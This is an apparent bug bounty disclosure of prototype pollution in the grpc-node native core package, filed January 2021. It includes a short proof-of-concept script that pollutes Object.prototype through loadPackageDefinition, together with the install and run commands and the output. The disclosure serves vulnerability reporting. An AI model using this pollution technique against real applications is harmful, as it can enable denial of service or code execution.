Prototype Pollution in grpc/grpc-node

Valid

Reported on

Jan 26th 2021

Description

grpc native core package is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.

Proof of Concept

Create the following PoC file:

// poc.js
var grpc =require('grpc')
grpc.loadPackageDefinition({'constructor.prototype.polluted': "Yes! Its Polluted"});
console.log({}.polluted)

Execute the following commands in another terminal:

npm i grpc # Install affected module
node poc.js #  Run the PoC

Check the Output:

[Function: ServiceClient] { service: 'Yes! Its Polluted' }

References

https://github.com/grpc/grpc-node/tree/grpc%401.24.x/packages/grpc-native-core

to join this conversation